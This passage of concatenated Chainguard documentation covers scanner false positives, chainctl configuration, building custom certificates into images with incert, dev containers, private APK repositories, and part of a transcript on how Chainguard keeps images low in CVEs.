Software Bill of Materials, is a helpful document that catalogs the packages and components of your software in a machine-readable format. Using an SBOM can improve your vulnerability scans as package information is stored in one place, so scanners don’t have to hunt down and risk missing component information throughout your software. There are different ways to generate an SBOM in order to improve its comprehensiveness and utility. To address the inconsistencies caused by software vendors using proprietary version naming schemes, adopting the purl specification can help. A purl, or package URL, aims to standardize versioning by outlining a convention that incorporates pertinent package information in every identifier. Using purls can reduce the number of false positives which surface by making it easier for scanners to align version information between data sources. Vulnerability Exploitability eXchange (VEX) [PDF] documents can provide helpful insight about the status of software vulnerabilities in a product. VEX documents allow developers to report the exploitability status of a vulnerability in a product through the use of identifiers. 
Using VEX can streamline the triage and remediation process by making it simpler to determine when action is needed for a given vulnerability. One way to leverage VEX documents is through OpenVEX, an open source implementation of the VEX specification. OpenVEX offers a set of tools to make ingesting and manipulating VEX documents easier. To learn more, check out our article on getting started with OpenVEX. Hardened Base Images A primary cause of large vulnerability counts reported in scanners is the dead weight caused by unnecessary dependencies. Many popular container images contain hundreds of packages, each with their own potential to introduce vulnerabilities, both true and false positives. Having so much noise to sift through draws out the vulnerability management process. Chainguard Containers, built on the Wolfi un-distro, can help you reduce your CVE count dramatically by keeping things minimal. By bundling only what is necessary to run the image, Chainguard Containers are hardened and lightweight in comparison to their counterparts. To learn more about how Chainguard Containers can help you achieve low (or zero!) CVEs in your containers, check out our documentation. Updating and Rebuilding Images Updating your container images to utilize recent stable package releases can help reduce the number of vulnerabilities found in your images. Research from Chainguard Labs has shown that popular container images accumulate about one CVE per day when not updated. In many cases, updating packages and rebuilding your images to incorporate them can readily resolve numerous vulnerabilities with released fixes. This may resolve false positive vulnerabilities outside of your program scope, allowing you to focus on the true positives which still remain. Learn More With false results mixed into your scans, triaging and addressing true positive vulnerabilities can quickly become a time-consuming task. Taking steps to adjust your scanner can help reduce the deluge of false positives and negatives clouding your scans, bringing you closer to securing your software. In this article, you learned how false results from your vulnerability scanners can occur, and how they can impact your development workflow. Additionally, you explored various ways you can improve the accuracy of your scanner through the application of tools like VEX, rebuilding your images, and choosing a base image suitable for your applications. To learn more about reducing false positives and negatives in your images, you can check out our collection of articles on SBOMs and VEX, read about selecting a base image for your applications, or discover how Chainguard Containers can help you reach zero CVEs in your containers. --- ### Manage Your chainctl Configuration URL: https://edu.chainguard.dev/chainguard/chainctl-usage/manage-chainctl-config/ Last Modified: December 12, 2024 Tags: chainctl, Product The Chainguard command line interface (CLI) tool, chainctl, will help you interact with the account model that Chainguard provides, and enable you to make queries into what’s available to you on the Chainguard platform. chainctl config CLI chainctl has a local configuration you can manage. To get a list of all options available, you can run: chainctl config -h You’ll receive output like the following: Local config file commands for chainctl. Usage: chainctl config [command] Available Commands: edit Edit the current chainctl config file. reset Remove local chainctl config files and restore defaults. 
save Save the current chainctl config to a config file. set Set an individual configuration value property. unset Unset a configuration property and return it to default. validate Run diagnostics on local config. view View the current chainctl config. Flags: -h, --help help for config Global Flags: --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") -o, --output string Output format. One of: ["", "json", "id", "table", "terse", "tree", "wide"] -v, --v int Set the log verbosity level. Use "chainctl config [command] --help" for more information about a command. To view your current chainctl config, run: chainctl config view You’ll receive output similar to this: # Base Config file: /home/erika/.config/chainctl/config.yaml auth: mode: browser device-flow: "" default: active-within: 24h0m0s autoclose: true autoclose-timeout: "10" group: "" identity-provider: "" org-name: "" skip-auto-login: false skip-version-check: false social-login: google-oauth2 use-refresh-token: true output: color: fail: '#ff0000' pass: '#00ff00' warn: '#ffa500' silent: false platform: api: https://console-api.enforce.dev audience: https://console-api.enforce.dev console: https://console.enforce.dev issuer: https://issuer.enforce.dev registry: https://cgr.dev The full documentation for the chainctl config command is available on the relevant reference page. Edit the chainctl Configuration You can edit the chainctl config directly with an editor. The following command will open your default command line text editor (typically nano) where you can edit the local chainctl config. chainctl config edit Alternatively, you can update one attribute at a time with the set option, as demonstrated in the next command: chainctl config set platform.api=https://console-api.enforce.dev You can review the chainctl config set options on the relevant docs page. Reset the Configuration If you run into issues with your chainctl configuration, you can use the following command to reset it to the default state: chainctl config reset You can review all the available chainctl commands in our chainctl reference documentation. --- ### How To Use incert to Create Container Images with Built-in Custom Certificates URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/incert-custom-certs/ Last Modified: July 8, 2023 Tags: Chainguard Containers, Product In many enterprise settings, an organization will have its own certificate authority which it uses to issue certificates for its internal services. This is often for security or control reasons but could also be related to regulatory requirements. If you’re using a container that needs to communicate with your organization’s services and your organization has its own certificate authority, you’ll need to add a valid certificate into your container. One way to do this is to mount the certificate as a volume at runtime. This works, but it means that everyone who uses the container has to go through the process of mounting the certificate. Another solution is to build the certificate directly into the container. 
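For comparison, the runtime-mount approach mentioned above usually looks something like the following sketch. The file name, image reference, and bundle path here are illustrative assumptions, not values from this guide; the path your base image uses for its CA bundle may differ.

```sh
# Hypothetical example: mount a CA bundle that includes the organization's
# certificate over the image's default bundle at runtime.
docker run --rm \
  -v "$PWD/corporate-ca-bundle.crt:/etc/ssl/certs/ca-certificates.crt:ro" \
  registry.example.com/my-app:latest
```

Every person and pipeline that runs the container has to repeat a mount like this one, which is the overhead that building the certificate into the image avoids.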
This tutorial outlines how to use incert — a Go tool from Chainguard that builds container images with certificates inserted into them. Prerequisites To follow along with this tutorial, you will need to have the following tools installed. incert, a Go program that appends CA certificates to Docker images and pushes the modified image to a specified registry. You can install this by following the instructions listed in the project’s GitHub repository. Docker, the open-source containerization platform. Set this up by following the platform-specific instructions on the project’s website. A tool for creating a self-signed certificate. This guide highlights using cfssl, a public key infrastructure toolkit from CloudFlare, but alternatives like openssl could also be used for this purpose. Follow the cfssl installation instructions to set this up. Note that if you use cfssl, you will also need the cfssljson utility installed as well. Creating a self-signed certificate First, let’s create a directory to hold your certificate infrastructure. mkdir ~/incert-example/ && cd $_ In the new directory, create a certificate signing request (CSR) by running the following command. cat > csr.json <<EOF { "hosts": [ "example.com", "www.example.com" ], "CN": "www.example.com", "key": { "algo": "rsa", "size": 2048 }, "names": [{ "C": "US", "L": "San Francisco", "O": "Example Company, LLC", "OU": "Operations", "ST": "California" }] } EOF We want to create some certificates for example.com and www.example.com, so we include these here in a list for the CSR’s hosts value. This means the certificates will only be valid for these domains. Next, create your certificates by running the following cfssl selfsign command. cfssl selfsign www.example.com csr.json | cfssljson -bare selfsigned Here we include the hostname we specified previously (www.example.com) as well as the CSR file. We then pipe the command’s output into a cfssljson command; this will process the .json files output by the cfssl selfsign command into the .pem files we need. This command will return a warning that self-signed certificates are insecure. This is the expected behavior for cfssl, and since we are only using these certificates to demonstrate how incert works there won’t be any security concerns. . . . *** WARNING *** Self-signed certificates are dangerous. Use this self-signed certificate at your own risk. It is strongly recommended that these certificates NOT be used in production. *** WARNING *** Following that, if you check the contents of your working directory you will find the self-signed CSR, the key, and the certificate. ls csr.json selfsigned.csr selfsigned-key.pem selfsigned.pem With these files in place you can move on to creating an nginx container that uses these certificates to provide TLS. Create an nginx container that uses self-signed certificates for TLS Now that you’ve created the certificate infrastructure, you can create an nginx container that uses them to provide TLS. Later on, we will attempt to reach this nginx container with a curl container we built using incert, testing that incert correctly installed the selfsigned.pem certificate into it. First run the following command to create an nginx configuration file named nginx.default.conf. This example is a fairly barebones configuration but will be adequate for the purposes of this guide. Note that it specifies the server should listen on port 8443 and will serve requests for example.com and www.example.com. 
It also specifies the location of the certificate and key to be used by the container, namely the /etc/nginx/conf.d/ directory. cat > nginx.default.conf <<EOF server { listen 8443 ssl; server_name example.com www.example.com; ssl_certificate /etc/nginx/conf.d/cert.pem; ssl_certificate_key /etc/nginx/conf.d/key.pem; location / { root /usr/share/nginx/html; index index.html index.htm; } error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } } EOF Then run the following command to create the nginx container. This command uses Chainguard’s public nginx image and mounts the cert.pem, key.pem, and nginx.default.conf files we’ve created into the /etc/nginx/conf.d directory within the container. It also includes the -p option, allowing you to forward requests on your host’s port 8443 to the container’s port 8443. docker run -p 8443:8443 -d \ -v ./nginx.default.conf:/etc/nginx/conf.d/nginx.default.conf \ -v ./selfsigned.pem:/etc/nginx/conf.d/cert.pem \ -v ./selfsigned-key.pem:/etc/nginx/conf.d/key.pem \ cgr.dev/chainguard/nginx Note: You may encounter permissions errors relating to the selfsigned.pem and selfsigned-key.pem files after running this command. In these cases, you can update their permissions by running sudo chmod 644 *.pem. Test connections to the nginx service with curl At this point, if you tried to use curl to access the running nginx container, the command will fail because curl disallows insecure connections by default. curl https://localhost:8443 curl: (60) SSL certificate problem: self-signed certificate More details here: https://curl.se/docs/sslcerts.html curl failed to verify the legitimacy of the server and therefore could not establish a secure connection to it. To learn more about this situation and how to fix it, please visit the web page mentioned above. You can force curl to ignore the self-signed certificate by passing it the -k argument, as in curl -k https://localhost:8443. However, our goal is to connect to the service securely using the certificate infrastructure created previously. In the next section we will use incert to create a new container image (using Chainguard’s curl image as the foundation) with your selfsigned.pem certificate built into it. Before doing this, though, let’s attempt to reach the nginx service with a curl container that does not have the certificate included. To do this you’ll need to find the nginx container’s IP address. First, find the name of the container with docker ps. docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 9e211033635b cgr.dev/chainguard/nginx "/usr/sbin/nginx -c …" 2 minutes ago Up 2 minutes 0.0.0.0:8443->8443/tcp, :::8443->8443/tcp agitated_jones As this output shows, the name of the nginx container in this example is agitated_jones. Replace this with the name of your own container in the following command: docker inspect --format '{{ .NetworkSettings.IPAddress }}' agitated_jones This will return the container’s IP address: 172.17.0.2 Next, use Chainguard’s curl image to attempt to reach the container. Be sure to replace 172.17.0.2 with your nginx container’s actual IP address, if different. docker run -it --add-host example.com:172.17.0.2 cgr.dev/chainguard/curl:latest-dev https://example.com:8443 Note: You might have noticed that example.com is a real website. 
Instead of using the curl container to reach the actual example.com, this command includes the --add-host option to map the hostname example.com to the local IP address currently being used by the nginx container. However, the public Chainguard curl image doesn’t have the certificate inside it, so this command will fail. curl: (60) rustls_connection_process_new_packets: invalid peer certificate: UnknownIssuer More details here: https://curl.se/docs/sslcerts.html curl failed to verify the legitimacy of the server and therefore could not establish a secure connection to it. To learn more about this situation and how to fix it, please visit the web page mentioned above. The next step is to create an image that has our self-signed certificate built into it. For that, we’ll use incert. Using incert to insert a custom certificate into an image incert is a Go program from Chainguard that appends CA certificates to Docker images and pushes the modified image to a specified registry. This tool is still in active development, so feedback is welcome. Run the following command to build a new image using Chainguard’s curl image as its base and insert the selfsigned.pem certificate into it. incert -ca-certs-file selfsigned.pem -platform linux/arm64 -image-url cgr.dev/chainguard/curl:latest -dest-image-url ttl.sh/curl-with-cert:1h This command uses the -ca-certs-file option to specify that incert should use the selfsigned.pem certificate file and the -platform option to specify that it wants to build an image for linux/arm64. Be aware that you should change the value passed to the -platform argument to reflect that of the host platform. It also includes the -image-url option to specify the image we want to build on as our base image (here we specify Chainguard’s curl image) and the -dest-image-url option to specify the registry where we want the resulting image to be uploaded. For this final option, this example specifies ttl.sh, an ephemeral Docker image registry. ttl.sh is free to use and does not require a login, making it useful for testing. However, it’s also public, so be sure that you do not upload any important private certificates there. This command will take a few moments to complete, but once it finishes you will receive output showing the image that was created and uploaded to the destination repo. ttl.sh/curl-with-cert:1h@sha256:877762fdd511a3df8aa24faf6a6209036370b7cfc1638e16b81098143c2a0215 Following that, you can re-execute the docker run command from the previous section, but replace the standard Chainguard curl image with the image you just built. docker run -it --add-host example.com:[ipaddress] ttl.sh/curl-with-cert:1h https://example.com:8443 This time, the curl container is able to reach the running nginx container. . . . <!DOCTYPE html> <html> <head> <title>Welcome to nginx!</title> <style> html { color-scheme: light dark; } body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; } </style> </head> <body> <h1>Welcome to nginx!</h1> <p>If you see this page, the nginx web server is successfully installed and working. Further configuration is required.</p> <p>For online documentation and support please refer to <a href="http://nginx.org/">nginx.org</a>.<br/> Commercial support is available at <a href="http://nginx.com/">nginx.com</a>.</p> <p><em>Thank you for using nginx.</em></p> </body> </html> This shows that incert built the certificate into the curl container as expected and it was able to reach the nginx container.
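If you want to confirm for yourself that the certificate ended up inside the new image, one way to check without relying on a shell in the distroless image is to copy the CA bundle out of a stopped container. The following sketch assumes incert appended the certificate to the standard /etc/ssl/certs/ca-certificates.crt bundle; the container and file names are arbitrary.

```sh
# Create (but don't start) a container from the image built with incert,
# copy its CA bundle to the host, then inspect the end of the bundle,
# which is where an appended certificate would appear.
docker create --name cert-check ttl.sh/curl-with-cert:1h
docker cp cert-check:/etc/ssl/certs/ca-certificates.crt ./image-ca-bundle.crt
docker rm cert-check
tail -n 30 image-ca-bundle.crt
```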
Learn more If you’d like to learn more about how you can use Chainguard Containers effectively, we encourage you to check out all of our resources on Working with Chainguard Containers. Additionally, our Recommended Practices resources can be useful for ensuring the security of your container images. --- ### Using Chainguard Containers in Dev Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/dev-containers/ Last Modified: March 8, 2025 Tags: Chainguard Containers, Product Development Containers — sometimes known as “dev containers” — allow you to use a container as a development environment where you can run applications and separate tools, libraries, or runtimes. Dev containers can also help with testing and continuous integration. With a few changes, the images based on Wolfi and maintained by Chainguard provide distroless images that can be used as dev containers. This guide outlines how you can set up a Chainguard image as a dev container in VS Code. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Prerequisites To follow along with this guide, you will need to have the following: A compatible Integrated Development Environment (IDE) or other tool. Here is a list of supported editors and tools. Note that this guide was validated using Visual Studio Code (VS Code). A Docker server to connect to. A local installation of Docker Desktop will usually suffice for demonstration purposes, but you can find full instructions in this guide on Developing inside a Container in the VS Code documentation. This guide’s first example assumes that you have a GitHub repository named empty. You can follow GitHub’s Quickstart for repositories for information on setting this up. What are Dev Containers? A development container is a container in which a user can develop an application. Development containers are isolated environments that allow developers to work on applications with all the necessary dependencies, tools, and configurations pre-packaged. These containers ensure that the development environment is consistent across different systems, avoiding the “works on my machine” problem. In order to run a dev container, the given project must contain a file named devcontainer.json. This is a special file defined by the Development Container Specification which holds all the metadata necessary to configure the dev container. Although there are many reasons why production images should be secure, the reasons for concern about the security of development environments are less clear. Put briefly: the code you’ve written and tested in your development environment will eventually make it into your production environment. If you’ve been hacked during development, then perhaps the hackers’ code goes into production as well. 
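Before moving on to the examples, it may help to see how small the devcontainer.json file mentioned above can be. The following is a minimal, hypothetical sketch that points a dev container at a Chainguard development image; the name, image tag, and user are assumptions for illustration, and the Go and Python walkthroughs below use more complete configurations.

```json
{
  "name": "example-devcontainer",
  "image": "cgr.dev/chainguard/go:latest-dev",
  "remoteUser": "root"
}
```

When an editor that supports the Dev Container Specification opens a project containing a file like this under .devcontainer/, it can offer to reopen the project inside the referenced container.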
Chainguard offers minimal runtime images designed for running production workloads, and development images that contain a shell and some development tooling. With that said, both development and production images are slimmed down and updated regularly to be free of CVEs. Because of their minimal and secure-by-default nature, Chainguard Containers are ideal for use in a secure development process. Building a Go Dev Container using an Example Repository The following is an example of how to set up a dev container using a Go project. Here, we will take the content of the chainguard-go-devcontainer directory in Chainguard’s demo GitHub repository and push it to the root of an empty repository. Start by cloning the repository: git clone https://github.com/chainguard-dev/edu-images-demos.git Then navigate into the chainguard-go-devcontainer example directory: cd edu-images-demos/chainguard-go-devcontainer From there, Initialize a Git repository: git init . Then add all the files there, including any hidden files: git add * .??* Commit the changes: git commit -am "Initial Commit" Add a GitHub repository that you have control over as a remote named origin. This example assumes that the repository is named empty but you can use any empty GitHub repository you have created: git remote add origin https://github.com/$YOUR-GITHUB-PROFILE/empty.git Be sure to change $YOUR-GITHUB-PROFILE to reflect the name of your GitHub profile. Finally, push the commit to the remote repository you just configured: git push -fu origin main Following that, if you open VS Code on this directory you will be prompted to open the project in a dev container. If you do reopen the project in a dev container it may take a minute or so to build the first time you use it. Open a terminal and you can run the sample project, even if you don’t have Go installed on your local machine: If you run a webserver in your dev container you will be asked if you want to open the port in a local browser. Exactly as if you were running in a local container: Building a Dev Container in other languages If you want to develop in languages other than Go, you’ll need to use a different base image. Note that to do this, you’ll need a working knowledge of Dockerfiles, Docker builds, JSON, as well as how your chosen language installs libraries or packages. There are a couple of different ways to set this up, and the exact configuration used in the following example is not strictly required as long as certain requirements are met. This example sets up a Python project and uses a Dockerfile and devcontainer.json in a .devcontainer directory. This has the advantage of keeping the code separate from the dev container configuration. Assuming you’re starting from a project with no dev container, you’ll first need to create the requisite files and folders. Start by creating a directory named .devcontainer and navigate into it: mkdir .devcontainer && cd $_ Next, create a dev container configuration file named devcontainer.json with the following command: cat > devcontainer.json <<EOF { "name": "my-devcontainer", "build": { "dockerfile": "Dockerfile", "args": {} }, "customizations": { "vscode": { "extensions": [ "ms-python.python" ] } }, "postCreateCommand": "pip install -r requirements.txt", "remoteUser": "nonroot" } EOF Because this is for a Python app, we are installing the VS Code python extension and using pip to install project dependencies. The postCreateCommand runs in the root of your project after it has been cloned into the container. 
If you don’t have a requirements.txt file with your project, the command will fail and you will need to remove the command to use the dev container. Following that, you’ll need to find a base image. Chainguard offers a wide range of images for different languages and ecosystems. To search, use the images directory. For this example, Chainguard’s Python image will suffice. Create a Dockerfile with the following command: cat > Dockerfile <<EOF FROM chainguard/python:latest-dev USER root RUN apk update && apk add posix-libc-utils && ldconfig USER nonroot RUN pip install pylance debugpy EOF Here’s what each line of this Dockerfile does: FROM: Many Chainguard images are available at Docker Hub, meaning you can set the FROM line in the Dockerfile like this example. Alternatively, you could set this with cgr.dev/chainguard/python or, if your Chainguard organization has access to a Production Python image, cgr.dev/$ORGANIZATION/python:$TAG. USER root: Including this line forces the next commands to run as root instead of the unprivileged user. Whether you need to include this line or not will depend on what image you’re using. You can check by running your image locally and using the id command. The following example shows that the Python image uses the nonroot user by default while the Go image uses root by default: docker run -it --entrypoint id chainguard/python:latest-dev uid=65532(nonroot) gid=65532(nonroot) groups=65532(nonroot) docker run -it --entrypoint id chainguard/go:latest-dev uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) RUN apk update …: This line installs the POSIX utilities (from which dev containers can use the getent command) and then updates the library links with ldconfig. ldconfig and getent are needed to allow the container start scripts from VS Code to run, though they may already be included in some base images. If your language needs any other packages that must be installed by the root user, now is the time to add them. USER nonroot: This continues the Dockerfile as the unprivileged user to install any other packages the language or VS Code extension might need. RUN pip install pylance debugpy: Finally, this line installs the pylance and debugpy packages — both used by the Python plugin — with pip. This is more for illustration purposes; you don’t have to install them now, since the plugin can install them later. Do not install packages your project needs here. The image build happens before the source code is cloned, so you’d need to duplicate the list of your dependencies in this file as well as wherever they are already listed. Instead, use the postCreateCommand. If you save those two files into an existing Python repository you will be able to reopen the project in a dev container. Customizing the image You can further customize the Dockerfile, but in some cases you may need to run commands as root. Chainguard’s minimal, distroless images do not include sudo and there is no root password to use. To add sudo, you can add the following line to the Dockerfile in the section running as the root user: RUN apk add sudo-rs shadow && echo "nonroot ALL = (ALL:ALL) NOPASSWD:ALL" >> /etc/sudoers && echo y | pwck -q || true Usage Notes GitHub Codespaces supports dev containers. However, at present they only work when the config is stored at the root directory. The IDE should pass your keys through to the dev container using ssh-agent and gpg-agent.
For this reason, you may need to install GPG or SSH tools inside the container. Please refer to the VS Code page on advanced usage for more information. Conclusion You should now have a development environment that does not require packages to be installed on your local machine and will run the same for anyone working on your project. You may want to add things like linting rules or other components to your dev container config. The VS Code website has many resources on working with dev containers which you may find useful. --- ### Chainguard's Private APK Repositories URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/private-apk-repos/ Last Modified: February 21, 2025 Tags: Chainguard Containers, Product With Chainguard’s Private APK Repositories, you can access packages that are included within your organization’s container image entitlements. This allows you to build custom images based on components that are already part of your organization catalog. This guide provides a brief overview of Chainguard’s private APK repositories and outlines different ways you can incorporate them into your organization’s workflows. NOTE: Chainguard’s private APK repositories feature is currently in the beta phase and it will likely go through changes before becoming generally available. About Private APK Repositories Chainguard’s private APK repos allow customers to pull secure apk packages from Chainguard. The list of packages available in an organization’s private repository is based on the apk repositories that the organization already has access to. For example, say your organization has access to the Chainguard MySQL container image. Along with mysql, this image comes with other apk packages, including bash, openssl, and pwgen. This means that you’ll have access to these apk packages through your organization’s private APK repository, along with any others that appear in Chainguard container images that your organization has access to. Chainguard’s private APK repositories are available to all Chainguard Containers customers. Your Repository Address Your private APK repository will be available at a URL like the following: https://apk.cgr.dev/$ORGANIZATION You will need to replace $ORGANIZATION with the name of your organization as it appears in the Chainguard Console. You can always find your private APK repository’s address by logging into the Chainguard Console and navigating to the Settings tab in the left-hand navigation menu. This will take you the General section where you can copy the repository address: In order to use your private repository, you must add this URL to the list of apk repositories found in an /etc/apk/repositories file, and you’ll also need to provide credentials to have access to this repo. To set this up, you must follow these general steps: Set up an HTTP_AUTH environment variable with appropriate credentials Add https://apk.cgr.dev/ORGANIZATION to /etc/apk/repositories Update your apk cache Install your desired packages In the following sections, this guide will outline how to implement this process in a live container and also when building container images from a Dockerfile or using apko. Authenticating to your Private APK Repository To access the apk packages in your private repository, you’ll first need to authenticate. You can do so by setting up an HTTP_AUTH environment variable with an authentication string that uses chainctl to obtain an ephemeral token to access the registry. 
The HTTP_AUTH environment variable expects a string in the following format: HTTP_AUTH=basic:apk.cgr.dev:user:password You will need to replace password with an apk token which you can obtain using the following chainctl command: chainctl auth token --audience apk.cgr.dev The following docker run command injects the HTTP_AUTH environment variable directly into the container by calling chainctl from the host machine: docker run -ti --rm \ -e "HTTP_AUTH=basic:apk.cgr.dev:user:$(chainctl auth token --audience apk.cgr.dev)" \ cgr.dev/$ORGANIZATION/$IMAGE In this command and throughout the rest of this guide, be sure to change $ORGANIZATION to reflect the name of your organization’s repository within Chainguard’s registry. Additionally, this guide was validated using the chainguard-base image, but you can use any container image that is part of your organization’s image catalog. However, to follow along with every example in this guide, you should use a container image that includes a shell, such as an image’s -dev variant. Also, you can initialize these placeholder values by setting them as environment variables as in the following examples. This will make it easier to follow along: ORGANIZATION="chainguard.edu" IMAGE="chainguard-base" This command will start an interactive container and open up a shell interface. From there, you can add your organization’s private APK repository to the list of apk repositories in /etc/apk/repositories. First, you’ll need to retrieve your organization’s private repository address. Recall that you can find this in the Settings tab in the Chainguard Console. From the interactive container’s shell, add the repository address to your list of apk repositories with a command like the following: echo https://apk.cgr.dev/$ORGANIZATION > /etc/apk/repositories Note that this command uses > to overwrite the contents of the /etc/apk/repositories file. You could instead append the private APK repository’s address with >>, but here we overwrite the file to ensure that we’re only installing packages from the private repo. Then update the apk cache to include the newly-added private repository: apk update Following that, you can proceed to search and install packages from your private APK repository. Searching for and Installing Packages As an example of how you can search for and install packages from these private repositories, this section will install wget. However, you could also try this out with any apk package that is included in any of the Chainguard container images your organization has access to. First, search for the wget package from the interactive container’s shell: apk search wget You will receive output similar to the following: wget-1.25.0-r0 You can call apk policy to find which repositories contain the package: apk policy wget This example output shows that it’s available from the private APK repository: wget policy: 1.24.5-r4: https://apk.cgr.dev/$ORGANIZATION 1.24.5-r5: https://apk.cgr.dev/$ORGANIZATION 1.25.0-r0: https://apk.cgr.dev/$ORGANIZATION Install the package with apk add: apk add wget Finally, run the same apk policy command you ran previously: apk policy wget wget policy: 1.24.5-r4: https://apk.cgr.dev/$ORGANIZATION 1.24.5-r5: https://apk.cgr.dev/$ORGANIZATION 1.25.0-r0: lib/apk/db/installed https://apk.cgr.dev/$ORGANIZATION This output shows that the wget package is now installed. Using Private APK Repositories with Dockerfiles So far, this guide has outlined how to manually fetch apk packages from a private repository.
We’ll now go over how to use a private APK repo within a Dockerfile workflow. We’ll be using the same organization, container image, and private package used in the previous examples. If you haven’t already done so, close the container you were running in the previous section. Then run the following command to create a Dockerfile. This Dockerfile uses Docker Build Secrets to inject the credentials into a RUN command that updates the apk cache and installs the wget apk package: cat > Dockerfile <<EOF FROM cgr.dev/$ORGANIZATION/$IMAGE USER root RUN echo https://apk.cgr.dev/$ORGANIZATION > /etc/apk/repositories RUN --mount=type=secret,id=cgr-token sh -c "export HTTP_AUTH=basic:apk.cgr.dev:user:\$(cat /run/secrets/cgr-token) && apk update && apk add wget" USER nonroot EOF Again, this Dockerfile overwrites the contents of the /etc/apk/repositories file. This isn’t necessary, but will force Docker to build the image and install the wget package without falling back to the default repositories. Now you can build the image while passing along credentials obtained with chainctl. The following example builds an image named my-custom-image: CGR_TOKEN=$(chainctl auth token --audience apk.cgr.dev) \ docker build --secret id=cgr-token,env=CGR_TOKEN . -t my-custom-image Following that, you can verify that the image has access to the private repository and contains the apk package that was installed at build time: docker run --rm my-custom-image apk policy wget wget policy: 1.24.5-r4: https://apk.cgr.dev/$ORGANIZATION 1.24.5-r5: https://apk.cgr.dev/$ORGANIZATION 1.25.0-r0: lib/apk/db/installed https://apk.cgr.dev/$ORGANIZATION As this output shows, the wget apk package is installed in the container. Using Private APK Repositories with Apko Builds You can also use your private APK repository with apko builds. One of the advantages of this method is that you can build distroless images that include only the apk packages you need in the final image. As with the previous examples, you’ll need to provide the HTTP_AUTH environment variable containing your Chainguard token to the apko runtime building the image.
The following apko configuration file includes the private APK repository used in previous examples and installs a single package (wget) in the image: cat > apko.yaml <<EOF contents: repositories: - https://apk.cgr.dev/$ORGANIZATION packages: - wget archs: - x86_64 - aarch64 EOF The following docker run command will inject the HTTP_AUTH environment variable within an apko runtime and build the image: docker run --rm \ -e "HTTP_AUTH=basic:apk.cgr.dev:user:$(chainctl auth token --audience apk.cgr.dev)" \ --workdir /work -v ${PWD}:/work \ cgr.dev/chainguard/apko build apko.yaml test-apk test-apk.tar You’ll get output similar to the following, indicating that the wget package was installed using the private APK repo: 2025/02/20 21:23:48 INFO Building images for 1 architectures: [amd64] 2025/02/20 21:23:48 INFO setting apk repositories: [https://apk.cgr.dev/$ORGANIZATION] 2025/02/20 21:23:50 INFO installing ca-certificates-bundle (20241121-r1) 2025/02/20 21:23:50 INFO installing wolfi-baselayout (20230201-r16) 2025/02/20 21:23:50 INFO installing ld-linux (2.40-r8) 2025/02/20 21:23:50 INFO installing glibc (2.40-r8) 2025/02/20 21:23:50 INFO installing libgcc (14.2.0-r8) 2025/02/20 21:23:50 INFO installing glibc-locale-posix (2.40-r8) 2025/02/20 21:23:50 INFO installing libcrypto3 (3.4.1-r0) 2025/02/20 21:23:50 INFO installing libssl3 (3.4.1-r0) 2025/02/20 21:23:50 INFO installing wget (1.25.0-r0) 2025/02/20 21:23:50 INFO setting apk repositories: [https://apk.cgr.dev/$ORGANIZATION] 2025/02/20 21:23:50 INFO built image layer tarball as /tmp/apko-temp-2854430999/apko-x86_64.tar.gz . . . Troubleshooting You may receive a 403 error when pulling down a package: 403 FORBIDDEN caller does not have the required capabilities This error may mean that your Chainguard identity doesn’t have the proper capabilities to download the package. To pull a package, the identity will need a role with the apk (list) capability. The least privileged role with this capability is apk.pull, though more privileged roles like owner, editor, and viewer also have this capability. You can check this and fix it by following these steps: Run chainctl auth status and check the Capabilities field in the output. If you don’t find the apk.pull role (or a more privileged role) for the organization you’re trying to pull from, you will need to add the role. Create the apk.pull role using the steps outlined in our Overview of Roles and Role-bindings resource. Try pulling the package again. As this feature is still in its beta phase, we invite feedback. If you would like to provide feedback or need further assistance troubleshooting, please reach out to our Customer Support team. Conclusion Private APK repositories offer customers a convenient way to make use of the packages their organization has access to. By following this guide, you should have a good understanding of how you can use them in your particular workflows. Be aware that you can use private APK repositories to install packages within container images customized with Chainguard’s Custom Assembly tool. Refer to our Custom Assembly documentation for more information. --- ### How Chainguard Creates Container Images with Low-to-No CVEs URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/zerocve/ Last Modified: March 21, 2025 Tags: Video, Chainguard Containers, Product Tools and resources used in this video Grype Wolfi Security Advisories Note: In November 2024, after this article was first written, Chainguard made changes to its free tier of container images.
In order to access the non-free container images used in this guide, you will need to be part of an organization that has access to them. For a full list of container images that will remain in Chainguard's free tier, please refer to this support page. Transcript I sometimes get asked how Chainguard manages to create container images with zero CVEs. Sometimes people claim it’s a trick or that we’re cheating in some way. It’s absolutely not a trick and I’m going to explain in this video how we do it. Now the first thing to be aware of is that our container images work with majority of scanners and they will flag CVEs if they’re present in our container images. So just to prove this I’m going to scan an old container image. So this is the flux Chainguard container image and it’s from I think around three months ago. So in that time since it’s been published it’s accumulated CVEs and Grype will tell us that. So in, I think it’s around three months, it’s accumulated three medium and 75 unknown CVEs. So some of you are probably aware that there’s issues at the NVD with classification at the minute which is why there’s so many unknown CVEs which is a bit unfortunate. It is telling me that they’re fixed or 71 of them are fixed, meaning that if we update these APKs they will go away. But yeah so that’s an old container image with CVEs. If I compare it to the current container image, “latest”, I am hoping, yes, there’s zero CVEs. So hopefully this proves that scanners or Grype at least will report CVEs in Chainguard Containers. There are basically three things we do to address CVEs. One we keep our container images as small as possible. By reducing the amount of software in an container image to the absolute minimum required we reduce the amount of software there is to have a CVE in the first place. Less packages means less vulnerabilities. And we take this seriously. Our production container images don’t even have a shell or package manager by default. Two: we’re really aggressive about keeping our software 